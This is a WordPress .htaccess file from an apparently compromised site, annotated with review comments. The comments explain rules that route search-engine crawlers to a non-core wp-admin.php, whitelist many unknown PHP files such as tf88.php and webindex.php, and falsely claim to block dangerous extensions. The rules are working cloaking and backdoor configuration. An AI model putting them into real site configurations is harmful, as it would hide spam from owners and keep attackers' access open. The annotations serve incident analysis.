File: /home/itmakcom/public_html/.htaccess
# NOTE(review): the rules between the BEGIN/END WordPress markers are not the
# stock WordPress rewrite block. The stock block only passes index.php through
# and sends requests for non-existent files and directories to /index.php.
# The additions below (pass-through rules for oddly named PHP files and
# User-Agent-conditional routing to a script inside wp-admin/) are consistent
# with a compromised site that serves different content to search-engine
# crawlers. Compare against a known-good copy before trusting any rule here.
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# WHITELIST - Allowed PHP files
# The "-" substitution leaves the URL unchanged and [L] ends rule processing,
# so a request for any of these names is served directly and skips every rule
# below. None of these names is a file shipped with WordPress core; each one
# that exists on disk needs to be inspected. Several rules are repeated
# (webindex, robot, robots, ws77); the repeats have no additional effect.
RewriteRule ^tf88\.php$ - [L]
RewriteRule ^XrdbXymas\.php$ - [L]
RewriteRule ^webindex\.php$ - [L]
RewriteRule ^webindexORI\.php$ - [L]
RewriteRule ^XrdbXydefault\.php$ - [L]
RewriteRule ^ZMYYdI7Hdefault\.php$ - [L]
RewriteRule ^robot\.php$ - [L]
RewriteRule ^robots\.php$ - [L]
RewriteRule ^ah88\.php$ - [L]
RewriteRule ^ws88\.php$ - [L]
RewriteRule ^tf77\.php$ - [L]
RewriteRule ^mas77\.php$ - [L]
RewriteRule ^webindex\.php$ - [L]
RewriteRule ^tx77\.php$ - [L]
RewriteRule ^lm77\.php$ - [L]
RewriteRule ^ws77\.php$ - [L]
RewriteRule ^robot\.php$ - [L]
RewriteRule ^robots\.php$ - [L]
RewriteRule ^ah77\.php$ - [L]
RewriteRule ^ws77\.php$ - [L]
# CORE WP - Directories
# Any path under these three directories is passed through unchanged. This
# includes /wp-admin/wp-admin.php, the target of the rewrites further down:
# in per-directory context the rule set runs again after a rewrite, and the
# ^wp-admin/ rule is what stops that second pass.
RewriteRule ^wp-admin/ - [L]
RewriteRule ^wp-includes/ - [L]
RewriteRule ^wp-content/ - [L]
# CORE WP - Files
# Pass-through for root-level WordPress files. The backslash before "-" is
# not needed in these patterns but is harmless.
RewriteRule ^wp\-config\.php$ - [L]
RewriteRule ^wp\-activate\.php$ - [L]
RewriteRule ^wp\-blog\-header\.php$ - [L]
RewriteRule ^wp\-comments\-post\.php$ - [L]
RewriteRule ^wp\-cron\.php$ - [L]
RewriteRule ^wp\-links\-opml\.php$ - [L]
RewriteRule ^wp\-load\.php$ - [L]
RewriteRule ^wp\-login\.php$ - [L]
RewriteRule ^wp\-mail\.php$ - [L]
RewriteRule ^wp\-settings\.php$ - [L]
RewriteRule ^wp\-signup\.php$ - [L]
RewriteRule ^wp\-trackback\.php$ - [L]
RewriteRule ^xmlrpc\.php$ - [L]
RewriteRule ^license\.txt$ - [L]
RewriteRule ^readme\.html$ - [L]
RewriteRule ^robots\.txt$ - [L]
# CUSTOM ROUTING - Bot Handling
# First rule: the THE_REQUEST condition matches a request line for the site
# root ("/" followed by a space or "?"). When the User-Agent also contains
# "google", "yahoo" or "aol" (case-insensitive; "googlebot" is already covered
# by "google"), the request is handed to /wp-admin/wp-admin.php.
# wp-admin/wp-admin.php is not a file shipped with WordPress core.
# NOTE(review): choosing the handler by User-Agent means crawlers can be shown
# a different page than ordinary visitors. Fetch the page with and without a
# crawler User-Agent to confirm what each one receives.
RewriteCond %{THE_REQUEST} \s/[?\s] [NC]
RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC]
RewriteRule ^ /wp-admin/wp-admin.php [L]
# Second rule: same User-Agent test, applied to any non-empty path that is not
# an existing regular file.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC]
RewriteRule ^(.+)$ /wp-admin/wp-admin.php [L]
# Robot/Xml Routing
# Applies to every client, not only crawlers: "robot" / "robots" (no
# extension) and any path ending in .xml go to wp-admin.php. There is no
# file-exists condition, so a real .xml file in the document root (a sitemap,
# for example) is shadowed by this rule. robots.txt itself is passed through
# by the earlier core-files rule.
RewriteRule ^robots?$ /wp-admin/wp-admin.php [L,NC]
RewriteRule .*\.xml$ /wp-admin/wp-admin.php [L,NC]
# Allow direct access to wp-admin.php
# Never reached as written: the ^wp-admin/ pass-through rule above matches
# this path first and ends processing.
RewriteRule ^wp-admin/wp-admin\.php$ - [L]
# Catch-all for non-existent files -> wp-admin.php
# Every remaining request that is not an existing regular file, for every
# client, is handed to wp-admin.php. Only !-f is tested, so directory
# requests are included.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /wp-admin/wp-admin.php [L]
# WordPress Default Fallback (for normal operation)
# NOTE(review): this looks unreachable. Any request that satisfies both !-f
# and !-d here has already matched the catch-all above, which ends processing
# with [L]. As written, wp-admin.php rather than /index.php is the front
# controller for the site.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# ==================================================
# SECURE ACCESS - Block Malicious Extensions
# NOTE(review): despite the heading, this section blocks nothing. With
# "Order Allow,Deny", "Allow from all" and no Deny line, access is granted to
# every file whose name ends in one of the listed extensions. A section that
# really denied them would need a Deny directive (or "Require all denied" in
# Apache 2.4 syntax).
# Order/Allow are Apache 2.2-style directives; on Apache 2.4 they are
# provided by mod_access_compat.
# The pattern spells out each upper/lower-case variant of php, php5, php7 and
# php8 instead of using a case-insensitive match. ".suspected" is presumably
# the suffix some scanners append when they quarantine a file - confirm.
# ==================================================
<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|php7|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$">
Order Allow,Deny
Allow from all
</FilesMatch>
# ==================================================
# SECURE ACCESS - Allow Whitelisted Core & Custom Files
# Grants access ("Order Allow,Deny" + "Allow from all") to files whose whole
# name matches one of the alternatives: index.php, wp-admin.php, the
# non-core PHP names (tf88.php, XrdbXymas.php, webindex.php, ...) and the
# root-level WordPress files.
# NOTE(review): the first alternative is the literal string
# "webindex.php(54) : eval()'d code(1) : eval()'d code". That is the form PHP
# reports for the current file name inside nested eval() calls, so this list
# was presumably generated by code running under eval() in webindex.php
# rather than written by hand. If so, restoring a clean .htaccess is not
# enough on its own: whatever writes this file has to be found and removed
# too, and every non-core file named here inspected.
# ==================================================
<FilesMatch "^(webindex\.php\(54\) \: eval\(\)'d code\(1\) \: eval\(\)'d code|index\.php|wp-admin\.php|tf88\.php|XrdbXymas\.php|webindex\.php|webindexORI\.php|XrdbXydefault\.php|ZMYYdI7Hdefault\.php|robot\.php|robots\.php|ah88\.php|ws88\.php|tf77\.php|mas77\.php|tx77\.php|lm77\.php|ws77\.php|ah77\.php|wp\-config\.php|wp\-activate\.php|wp\-blog\-header\.php|wp\-comments\-post\.php|wp\-cron\.php|wp\-links\-opml\.php|wp\-load\.php|wp\-login\.php|wp\-mail\.php|wp\-settings\.php|wp\-signup\.php|wp\-trackback\.php|xmlrpc\.php|license\.txt|readme\.html|robots\.txt)$">
Order Allow,Deny
Allow from all
</FilesMatch>